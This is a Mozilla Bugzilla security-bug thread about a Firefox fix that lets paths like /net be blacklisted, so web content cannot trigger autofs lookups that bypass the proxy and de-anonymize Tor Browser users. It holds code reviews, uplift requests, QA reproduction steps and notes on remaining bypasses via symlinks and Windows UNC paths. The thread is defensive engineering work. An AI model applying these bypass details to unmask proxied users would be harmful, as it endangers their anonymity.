Review of attachment 8979286 [details] [diff] [review]:
-----------------------------------------------------------------

::: netwerk/test/gtest/TestFilePreferences.cpp
@@ +1,1 @@
> +#include "gtest/gtest.h"

should this live in xpcom?

::: xpcom/io/FilePreferences.cpp
@@ +70,5 @@
> +    Unused << p.ReadUntil(Tokenizer::Token::Char(','), path);
> +    if (!path.IsEmpty()) {
> +      PathBlacklist().AppendElement(path);
> +    }
> +  } while (!p.CheckEOF());

you don't need Record()
you have to read (check) the ',' character
the loop should be `while (!p.CheckEOF()) { do stuff; }
you may want to do path.Trim() as you don't skip whitespaces
Valentin: Do you have an updated WIP patch we could test/include in our upcoming alpha? Right now, this is the only blocker for us for switching Tor Browser to ESR 60 next week in our alpha series: We can't ship the alpha with no workaround for this (for us) critical issue given that we "fixed" it a couple of months ago with an emergency release during the ESR 52 cycle.
Flags: needinfo?(valentin.gosu)
Attached patch patch (obsolete) — Splinter Review
Attachment #8985964 - Flags: review?(honzab.moz)
Attachment #8979286 - Attachment is obsolete: true
(In reply to Georg Koppen from comment #67)
> Valentin: Do you have an updated WIP patch we could test/include in our
> upcoming alpha? Right now, this is the only blocker for us for switching Tor
> Browser to ESR 60 next week in our alpha series: We can't ship the alpha
> with no workaround for this (for us) critical issue given that we "fixed" it
> a couple of months ago with an emergency release during the ESR 52 cycle.

Check out attachment 8985964 [details] [diff] [review]. I think it's fairly final. I'm just waiting for Honza's review and writing a few more tests for it.
Flags: needinfo?(valentin.gosu)
Comment on attachment 8985964 [details] [diff] [review]
patch

Review of attachment 8985964 [details] [diff] [review]:
-----------------------------------------------------------------

giving r+ with comments only because this is high priority and I may be offline few following days.  but there are things that MUST be addressed before landing.  please read all the comments.

::: xpcom/io/FilePreferences.cpp
@@ +64,5 @@
> +  nsAutoCString blacklist;
> +  Preferences::GetCString("network.file.path_blacklist", blacklist);
> +  Tokenizer p(blacklist);
> +  while (!p.CheckEOF()) {
> +    nsCString path;

please use nsDependentCSubstring to save memory copying

@@ +69,5 @@
> +    Unused << p.ReadUntil(Tokenizer::Token::Char(','), path);
> +    path.Trim(" ");
> +    if (!path.IsEmpty()) {
> +      PathBlacklist().AppendElement(path);
> +    }

nit: you must consume the ',' token

@@ +236,5 @@
> +bool IsAllowedPath(const nsACString& aFilePath)
> +{
> +  for (const auto& prefix : PathBlacklist()) {
> +    if (StringBeginsWith(aFilePath, prefix)) {
> +      if (aFilePath.Length() != prefix.Length() &&

maybe a nit for better readability: aFilePath.Length() > prefix.Length()

::: xpcom/io/nsLocalFileUnix.cpp
@@ +141,5 @@
>        dirPath.IsEmpty()) {
>      return NS_ERROR_FILE_INVALID_PATH;
>    }
>  
> +  // When enumerating the directory, the paths have a slash at the end.

have or don't have?

OTOH, can we even get here?  few lines above you do aParent->GetNativePath().  has not the aParent object already been subjected to the check for path allowance?

@@ +329,5 @@
> +      FindInReadable(NS_LITERAL_CSTRING("/./"), mPath) ||
> +      FindInReadable(NS_LITERAL_CSTRING(".."), mPath) ||
> +      FindInReadable(NS_LITERAL_CSTRING("//"), mPath)) {
> +    mPath.Truncate();
> +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;

OK, this can't be here.  This was my main concern with the previous patch.  This can potentially break things.  It definitely changes behavior, is not behind the pref and definitely cannot be uplifted like this to ESR.

Move these lines INSIDE FilePreferences::IsAllowedPath and do it ONLY when there are names (prefixes) to be blacklisted or do the normalization as I do in my base patch (you will need the normalizer be a template and derive from TTokenizer<chat_path_t>, like #ifdef XPWIN typedef char16_t char_path_t; #else typedef char char_path_t; #endif)

But I think this "has special dir -> throw" approach if fine when off by default.  

OTOH, note that paths get here likely already normalized, at least on windows I could see that navigating to file:///c:/./././././././././././ is file://c:/ when coming to InitWithPath, no idea where that happens, but I made sure no smb request/lookup was triggered before InitWithPath was entered for file://///share uris.


hmm... we should make sure there is no code in upper layers that may look for /. or /.. in the path and call some system API normalization function that could trigger the smb/net lookup.


then, just for case, remember that ':' is a directory delimiter on osx!

@@ +576,5 @@
> +  }
> +
> +  if (FindInReadable(NS_LITERAL_CSTRING(".."), aFragment)) {
> +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> +  }

same case as above.
Attachment #8985964 - Flags: review?(honzab.moz) → review+
Attached patch patch (obsolete) — Splinter Review
Attachment #8985964 - Attachment is obsolete: true
(In reply to Honza Bambas (:mayhemer) from comment #70)
> Comment on attachment 8985964 [details] [diff] [review]
> > +  while (!p.CheckEOF()) {
> > +    nsCString path;
> 
> please use nsDependentCSubstring to save memory copying

I kept it nsCString to be able to still do path.Trim(" ")
Since this only happens once, at startup, the extra number of copies should be minimal.

> > +  // When enumerating the directory, the paths have a slash at the end.
> have or don't have?

Changed it to must have.

> OTOH, can we even get here?  few lines above you do
> aParent->GetNativePath().  has not the aParent object already been subjected
> to the check for path allowance?

Yes, but that depends on the blacklisted path. If the parent name is /folder and we blacklisted /folder/ it will not match, but all of its children will.

> 
> @@ +329,5 @@
> > +      FindInReadable(NS_LITERAL_CSTRING("/./"), mPath) ||
> > +      FindInReadable(NS_LITERAL_CSTRING(".."), mPath) ||
> > +      FindInReadable(NS_LITERAL_CSTRING("//"), mPath)) {
> > +    mPath.Truncate();
> > +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> 
> OK, this can't be here.  This was my main concern with the previous patch. 
> This can potentially break things.  It definitely changes behavior, is not
> behind the pref and definitely cannot be uplifted like this to ESR.

Fair enough. Note that I kept some of the changes in AppendRelativeNativePath:
Append('.') does nothing.
Append('..') throws NS_ERROR_FILE_UNRECOGNIZED_PATH just like the windows implementation, and as specified in nsIFile.idl
I think the fact that it was accepted was a bug.

> Move these lines INSIDE FilePreferences::IsAllowedPath and do it ONLY when
> there are names (prefixes) to be blacklisted or do the normalization as I do
> in my base patch (you will need the normalizer be a template and derive from
> TTokenizer<chat_path_t>, like #ifdef XPWIN typedef char16_t char_path_t;
> #else typedef char char_path_t; #endif)

I made the Normalizer a template instead.
We now build the fileBlacklist code on windows too, even though it does nothing.

> But I think this "has special dir -> throw" approach if fine when off by
> default.  
> 
> OTOH, note that paths get here likely already normalized, at least on
> windows I could see that navigating to file:///c:/./././././././././././ is
> file://c:/ when coming to InitWithPath, no idea where that happens, but I
> made sure no smb request/lookup was triggered before InitWithPath was
> entered for file://///share uris.

I think this is done in nsLocalFile::Normalize().
However, on Linux it performs a call to the system realpath, which resolves relative paths and also links.

> then, just for case, remember that ':' is a directory delimiter on osx!

I think this was in older OSX versions (from what I can find on Google).

> @@ +576,5 @@
> > +  }
> > +
> > +  if (FindInReadable(NS_LITERAL_CSTRING(".."), aFragment)) {
> > +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> > +  }
> 
> same case as above.

I'll keep this one around (to fix nsIFile.idl inconsistency) unless it breaks some tests.
Try run:
https://treeherder.mozilla.org/#/jobs?repo=try&revision=96829d5130514aa993137ca87611f1c93309db82

Georg, let me know if the attached patch is OK.
Note that it depends on Honza's patch from bug 1413868.

A few notes about the patch:
In order to block file access to "/net" you should add a pref (name:"network.file.path_blacklist", value:"/net")
It does have one weakness: symlinks. For a given symlink A that is not blacklisted it is impossible to know if its target B is blacklisted or not.
Flags: needinfo?(gk)
Attached patch patchSplinter Review
Attachment #8986314 - Attachment is obsolete: true
(In reply to Valentin Gosu [:valentin] from comment #73) 
> > > +  if (FindInReadable(NS_LITERAL_CSTRING(".."), aFragment)) {
> > > +    return NS_ERROR_FILE_UNRECOGNIZED_PATH;
> > > +  }
> > 
> > same case as above.
> 
> I'll keep this one around (to fix nsIFile.idl inconsistency) unless it
> breaks some tests.

Turns out it broke some tests. :)
test_bug1056939.js tested files that contained .. in them.
test_file_equality.js checks that appending . gives you a different file.

I filed bug 1469737 for this.

I also fixed the nsTArray_base leak at shutdown.
(In reply to Valentin Gosu [:valentin] from comment #74)
> Try run:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=96829d5130514aa993137ca87611f1c93309db82
> 
> Georg, let me know if the attached patch is OK.

Do you have one rebased against ESR60 handy by chance? I get a bunch of conflicts in FilePreferences.cpp when trying to apply your patch. I'll try to resolve them but I am a bit nervous about the correctness of the result.

> Note that it depends on Honza's patch from bug 1413868.
> 
> A few notes about the patch:
> In order to block file access to "/net" you should add a pref
> (name:"network.file.path_blacklist", value:"/net")
> It does have one weakness: symlinks. For a given symlink A that is not
> blacklisted it is impossible to know if its target B is blacklisted or not.

What does that mean in practise? If an attacker is pointing to symlink A the proxy bypass we try to avoid is getting triggered?
Flags: needinfo?(gk) → needinfo?(valentin.gosu)
This is too late for ESR52 at this point (we've already built the 52.9.0 RC and that's the last scheduled release for that branch). We still want this for Fx62 & ESR 60.2, though.
(In reply to Georg Koppen from comment #79)
> (In reply to Valentin Gosu [:valentin] from comment #74)
> > Try run:
> > https://treeherder.mozilla.org/#/
> > jobs?repo=try&revision=96829d5130514aa993137ca87611f1c93309db82
> > 
> > Georg, let me know if the attached patch is OK.
> 
> Do you have one rebased against ESR60 handy by chance? I get a bunch of
> conflicts in FilePreferences.cpp when trying to apply your patch. I'll try
> to resolve them but I am a bit nervous about the correctness of the result.

I'll try to rebase it.

> > Note that it depends on Honza's patch from bug 1413868.
> > 
> > A few notes about the patch:
> > In order to block file access to "/net" you should add a pref
> > (name:"network.file.path_blacklist", value:"/net")
> > It does have one weakness: symlinks. For a given symlink A that is not
> > blacklisted it is impossible to know if its target B is blacklisted or not.
> 
> What does that mean in practise? If an attacker is pointing to symlink A the
> proxy bypass we try to avoid is getting triggered?

It means that if the attacker can create a symlink that points to B, or if the attacker is aware of A that points to B, they could potentially bypass the filter. That seems unlikely to me, but it's important to keep in mind.
Attached patch [ESR60] patch (obsolete) — Splinter Review
Georg, here is ESR patch. I have yet to build it on Windows, but it passes all the test on Linux.
Also it seems I didn't properly fix the shutdown leak.
Flags: needinfo?(valentin.gosu)
Attached patch [ESR60] patch (obsolete) — Splinter Review
The build selftest failed because the pref needed to be added to the early list
Attachment #8986596 - Flags: review?(bkelly)
Attachment #8986493 - Attachment is obsolete: true
Comment on attachment 8986596 [details] [diff] [review]
[ESR60]  patch

Review of attachment 8986596 [details] [diff] [review]:
-----------------------------------------------------------------

I only reviewed the ContentPrefs.cpp file.  It looked like the rest of the patch had already been reviewed elsewhere in this bug.
Attachment #8986596 - Flags: review?(bkelly) → review+
(In reply to Valentin Gosu [:valentin] from comment #87)
> Created attachment 8986596 [details] [diff] [review]
> [ESR60]  patch
> 
> The build selftest failed because the pref needed to be added to the early
> list

That one works for us, thanks so much! (The one you pointed me to in comment:83 still shows the problem. It took me a while to figure out what was going on :) )

I am not sure about the symlink issue yet. While I am not worried about the attacker being able to create a symlink I feel it should not be possible for arbitrary (third-party) web content to trigger any proxy bypass in case the user has told the browser "hey, for any web-related traffic, please use proxy $foo", irrespective of how the machine of the user outside of the browser is configured. This does not block our alpha release, but we should think about it while we progress towards getting Tor Browser 8 into stable shape.
Nathan, can you take a look at attachment 8986337 [details] [diff] [review] ?
I'm leaking an nsTArray_base, sBlacklist, and I'm not exactly sure I'm using StaticAutoPtr correctly.
I've confirmed it's not sWhitelist by commenting it out: https://treeherder.mozilla.org/#/jobs?repo=try&revision=064c72d8511a3fa831cef3282fb75930ad6acf93&selectedJob=184200087

Any idea why this leak is happening? Thanks!
Talking to Valentin over IRC turned up two potential scenarios for sBlacklist to leak:

a) InitPrefs possibly getting called after sBlacklist has been released:

https://hg.mozilla.org/try/rev/7fb190786695#l1.49

So we're re-initializing prefs after shutdown...which seems quite unlikely.

b) Some sort of race in IsAllowedPath:

https://hg.mozilla.org/try/rev/145bf576adf9#l1.358

T1: In IsAllowedPath, check for the presence of sBlacklist
T1: sBlacklist is there, proceed
T2: clear sBlacklist as we're going through shutdown
T1: Call PathBlacklist, which re-allocates sBlacklist and leaks

This race is plausible in attachment 8986337 [details] [diff] [review] (though we really should have some checking in the ClearOnShutdown machinery to catch this sort of thing), but the try push actually changes things in IsAllowedPath:

https://hg.mozilla.org/try/file/5c706ce50459/xpcom/io/FilePreferences.cpp#l267

so that we don't try reallocating...but in that case, we should hit some sort of null pointer dereference if the race was really happening.

I tried getting a handle on where the allocated nsTArray_base was coming from, but the debugging infrastructure we had for that blew up in my face.

So now I'm not sure where the leak is coming from. =/
This call gated by ifdef OS_WIN - so on Linux it would leak objects that were supposed to be ClearOnShutdown in the plugin process
Attachment #8990057 - Flags: review?(jmathies)
Comment on attachment 8990058 [details] [diff] [review]
Add ability to blacklist file paths on Unix platforms

Review of attachment 8990058 [details] [diff] [review]:
-----------------------------------------------------------------

::: xpcom/io/FilePreferences.cpp
@@ +10,2 @@
>  #include "mozilla/Preferences.h"
> +#include "mozilla/StaticPtr.h"

when you are here, can you please incorporate [1] here?  just the #include.  thanks.  or, maybe it belongs to the header?

[1] https://bugzilla.mozilla.org/attachment.cgi?id=8986398&action=diff#a/xpcom/io/FilePreferences.cpp_sec2

@@ +120,5 @@
>    }
>  
> +  bool Get(nsTSubstring<TChar>& aNormalizedFilePath)
> +  {
> +    aNormalizedFilePath.Truncate();

there probably wasn't a need to inline this, but as this is static, it doesn't matter

@@ +269,5 @@
> +    return true;
> +  }
> +
> +  nsTAutoString<char_path_t> normalized;
> +  if (!Normalizer<char_path_t>(aFilePath, Normalizer<char_path_t>::Token::Char(kPathSeparator)).Get(normalized)) {

don't you want TNormalizer<T> and then then `typedef TNormalizer<char_path_t> Normalizer;` ?

::: xpcom/io/nsLocalFileUnix.cpp
@@ +1048,4 @@
>  
>    // check to make sure that we have a new parent
>    nsAutoCString newPathName;
>    rv = GetNativeTargetPathName(aNewParent, aNewName, newPathName);

we may want to check before this call

@@ +2199,4 @@
>  
>    // check to make sure that we have a new parent
>    nsAutoCString newPathName;
>    rv = GetNativeTargetPathName(aNewParentDir, aNewName, newPathName);

as well here?
Attachment #8990058 - Flags: review?(honzab.moz) → review+
(In reply to Honza Bambas (:mayhemer) from comment #94)
> don't you want TNormalizer<T> and then then `typedef
> TNormalizer<char_path_t> Normalizer;` ?

Great suggestion, Thanks!

> ::: xpcom/io/nsLocalFileUnix.cpp
> >    rv = GetNativeTargetPathName(aNewParent, aNewName, newPathName);
> 
> we may want to check before this call
> >    rv = GetNativeTargetPathName(aNewParentDir, aNewName, newPathName);
> 
> as well here?

Before these calls we have CHECK_mPath which checks FilePreferences::IsAllowedPath()
Attachment #8990057 - Flags: review?(jmathies) → review+
https://hg.mozilla.org/integration/mozilla-inbound/rev/9ec0f327c5efc38970c090015eaf11a7e5c450b7
Bug 1412081 - Add ability to blacklist file paths on Unix platforms r=mayhemer

https://hg.mozilla.org/integration/mozilla-inbound/rev/26163df1083ea2847022e60518ab973360b9d7c1
Bug 1412081 - Call KillClearOnShutdown(ShutdownPhase::ShutdownFinal) in PluginProcessChild on all platforms r=jimm
https://hg.mozilla.org/mozilla-central/rev/9ec0f327c5ef
https://hg.mozilla.org/mozilla-central/rev/26163df1083e
Group: network-core-security → core-security-release
Status: NEW → RESOLVED
Closed: Last year
Resolution: --- → FIXED
Target Milestone: --- → mozilla63
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #46)
> I think Boris added a bunch of very valuable information within comment 44.
> Probably it's best we don't do stat() within ::init() but instead rather
> move it to asyncOpen2. Or more precisely to the contentSecurityManager right
> after we preform the CheckLoadURI check.

I'm late to this particular party, but should we perhaps still pursue this in a follow-up bug as a belt-and-suspenders type mitigation in case attackers find another type of path that somehow leaks information in this way? Christoph?
Flags: needinfo?(ckerschb)
Mind requesting uplift to beta/esr60?
Flags: needinfo?(valentin.gosu)
Attachment #8990058 - Attachment is obsolete: true
Comment on attachment 8993177 [details] [diff] [review]
Add ability to blacklist file paths on Unix platforms

Approval Request Comment
[Feature/Bug causing the regression]:
TOR requirement to block access to certain paths on the filesystem

[User impact if declined]:
A website could potentially anonymize a user who has autofs installed by triggering the access of certain paths in /net/ on Unix-like machines.

[Is this code covered by automated tests?]:
The patch includes a gtest

[Has the fix been verified in Nightly?]:
Yes

[Needs manual test from QE? If yes, steps to reproduce]: 
Reproduce comment 0. Set network.file.path_blacklist to /net. Restart the browser. Check that the bug is fixed.

[List of other uplifts needed for the feature/fix]:
attachment 8990057 [details] [diff] [review] to avoid leaks in the plugin process.

[Is the change risky?]:
Low risk

[Why is the change risky/not risky?]:
The patch only produces effects when the pref is set, which will probably only affect TOR.

[String changes made/needed]:
None.
Flags: needinfo?(valentin.gosu)
Attachment #8993177 - Flags: approval-mozilla-beta?
Attachment #8986596 - Attachment is obsolete: true
Comment on attachment 8993178 [details] [diff] [review]
[ESR60]  patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
Required in TOR.

User impact if declined:
[TOR] A website could potentially anonymize a user who has autofs installed by triggering the access of certain paths in /net/ on Unix-like machines.

Fix Landed on Version:
Firefox 63 with an uplift requested for beta 62.

Risk to taking this patch (and alternatives if risky):
Low risk. Functionality is only enabled with the hidden pref set, which would be only in TOR.

String or UUID changes made by this patch:
None.
Attachment #8993178 - Flags: approval-mozilla-esr60?
Hi Valentin, just a note, generally by "verified" we mean that the issue was reproducible and the fix was checked by someone who isn't the assignee or reviewer.
Flags: qe-verify+
Comment on attachment 8993177 [details] [diff] [review]
Add ability to blacklist file paths on Unix platforms

Fix for potential de-anonymization, let's uplift for beta 11.
Attachment #8993177 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #8990057 - Flags: approval-mozilla-beta+
I didn't manage to reproduce the issue. I used an older version of Firefox (2017-10-26) on Ubuntu 16.04 x64 and macOS 10.13. 

Can you please give me some more detailed steps to reproduce or a screencast with the steps?
Thank you.
Flags: needinfo?(arthuredelstein)
(In reply to Oana Botisan from comment #108)
> I didn't manage to reproduce the issue. I used an older version of Firefox
> (2017-10-26) on Ubuntu 16.04 x64 and macOS 10.13. 
> 
> Can you please give me some more detailed steps to reproduce or a screencast
> with the steps?
> Thank you.

How did you try to reproduce this bug?
Flags: needinfo?(oana.botisan)
With the steps from comment 0 mostly.
I used 2 different stations. One was on mac and the other on Ubuntu.
On mac I created the pref from comment 103 (network.file.path_blacklist set to /net). I changed the proxy and port and I opened the link from comment 0 (https://pearlcrescent.com/tor/am.html).

On Ubuntu, I opened Firefox, changed the pref and port and then in the terminal I wrote the command "sudo tcpdump port 111".

Did I do everything wrong? Maybe I didn't understand fully what I have to do, because I got the same behaviour on the old builds as on the latest Nightly.
Flags: needinfo?(oana.botisan)
What version of macOS are you on?

This issue will no longer occur on 10.13.3 or newer.
I was on macOS 10.13. 
But the steps were correct?
(In reply to Oana Botisan from comment #110)
> With the steps from comment 0 mostly.
> I used 2 different stations. One was on mac and the other on Ubuntu.
> On mac I created the pref from comment 103 (network.file.path_blacklist set
> to /net). I changed the proxy and port and I opened the link from comment 0
> (https://pearlcrescent.com/tor/am.html).
> 
> On Ubuntu, I opened Firefox, changed the pref and port and then in the
> terminal I wrote the command "sudo tcpdump port 111".
> 
> Did I do everything wrong? Maybe I didn't understand fully what I have to
> do, because I got the same behaviour on the old builds as on the latest
> Nightly.

I am not sure regarding macOS but on Linux you need to install the autofs package and uncomment the line "/net   -hosts" in /etc/auto.master first as a preparation step. When testing our backport for this patch I configured Tor as a proxy (just installing Tor via your package manager should suffice and then entering 127.0.0.1:9050 as the SOCKS proxy host/port) and then looked at my local wireshark output. Hope this helps. Let me know if not.
Flags: needinfo?(arthuredelstein)
I can't seem to be able to reproduce the issue, therefore I can't verify the fix. I will take out the qe+ flag.
Can you please verify to see if the bug is reproducing on the latest beta and Nightly?
Flags: qe-verify+ → needinfo?(arthuredelstein)
Whiteboard: [tor 24052][sec-critical for Tor][necko-triaged] → [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage]
(In reply to :Gijs (he/him) from comment #98)
> I'm late to this particular party, but should we perhaps still pursue this
> in a follow-up bug as a belt-and-suspenders type mitigation in case
> attackers find another type of path that somehow leaks information in this
> way? Christoph?

Yes, at least we should try. FWIW, I filed Bug 1479410 for that reason.
Flags: needinfo?(ckerschb)
Comment on attachment 8993178 [details] [diff] [review]
[ESR60]  patch

Fixes a critical issue for Tor browser users and behavior is behind a pref not exposed to regular Firefox users. Approved for ESR 60.2.
Attachment #8993178 - Flags: approval-mozilla-esr60? → approval-mozilla-esr60+
(In reply to Ryan VanderMeulen [:RyanVM] from comment #118)
> Backed out from ESR60 for Linux/OSX leaks and Windows GTest failures.

The leaks are caused by the fact that attachment 8990057 [details] [diff] [review] should also land with the ESR patch.
Looking at the gtest failure now.
Attachment #8990057 - Flags: approval-mozilla-esr60+
Attached patch esr_fix.patchSplinter Review
As the comment in the patch says, the changes I made required the whitelist to be properly instantiated - which the gtest did not previously do.
Flags: needinfo?(valentin.gosu)
In the future, it would be really nice if the follow-up patches were folded into the main patch for landing.
(In reply to Ryan VanderMeulen [:RyanVM] from comment #121)
> In the future, it would be really nice if the follow-up patches were folded
> into the main patch for landing.

Will do. Thanks!
Depends on: 1413868
Valentin, there seems to be some kind of discrepancy between our code base and the tore code base on ESR60 (IIUC).

Our code (the current, latest changeset):
https://hg.mozilla.org/releases/mozilla-esr60/annotate/8a1e8be23bad/xpcom/io/FilePreferences.cpp#l263

Tor code:
(patch) https://gitweb.torproject.org/user/richard/tor-browser.git/commit/xpcom/io/FilePreferences.cpp?h=bug_26874&id=50f4653b90316394e7d6d3cd4a3e92e12f377666
(file) https://gitweb.torproject.org/user/richard/tor-browser.git/tree/xpcom/io/FilePreferences.cpp?h=bug_26874&id=50f4653b90316394e7d6d3cd4a3e92e12f377666#n263

Please see https://bugzilla.mozilla.org/show_bug.cgi?id=1413868#c70 for further details.  They claim that the patches don't work and removing the |if (!sWhitelist) { return false; }| part fixes it.

It may be that AllowUNCDirectory() which ensures sWhitelist is not called from some reason.

Maybe we should change the code to block all unc paths when sWhitelist is null and sBlockUNCPaths == true?


It's hard to track what's actually correct with all the backouts and merges.


Note: https://dxr.mozilla.org/mozilla-esr60/ is out of sync ://
Flags: needinfo?(valentin.gosu)
Ok I have access now!

Yeah so the issue here is that sWhitelist is only populated after a call to PathWhitelist().  The various directories are whitelisted during firefox init (and sWhitelist is populated) in AllowUNCDirectory(char const*) by way of InitDirectoriesWhitelist().  However, the call to PathWhitelist() does not occur until the end of AllowUNCDirectory(), and only if the directory resolves to an SMB path (ie, begins with \\).  So, unless one of the special dirs live on an SMB share, sWhitelist will never be populated, and the call to IsBlockedUNCPath() will always early out due to the !sWhiteList check.

The !sWhitelist check should be removed, since the underlying pointer is never accessed directly, and always through the PathWhitelist() getter/initializer.

I've a screenshot ( here: https://bugzilla.mozilla.org/show_bug.cgi?id=1413868 ) demoing the proxy bypass still exists in ESR60 on Windows 7.
(In reply to Honza Bambas (:mayhemer) from comment #124)
> Valentin, there seems to be some kind of discrepancy between our code base
> and the tore code base on ESR60 (IIUC).

I think that's because TOR landed the patch in before comment 89 (attachment 8986596 [details] [diff] [review]) and the ESR patch landed a bit later, with a few nits.

The version in m-c actually does not contain the sWhitelist thing, since the leak didn't happen on Windows, so I assume we should probably update TOR and ESR.

(In reply to Richard Pospesel (Tor Browser Dev) from comment #125)
> The !sWhitelist check should be removed, since the underlying pointer is
> never accessed directly, and always through the PathWhitelist()
> getter/initializer.

I agree. I'll file a separate bug for it.
Flags: needinfo?(valentin.gosu)
Depends on: 1483377
Whiteboard: [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage] → [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage][adv-main62+][adv-esr60.2+]
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.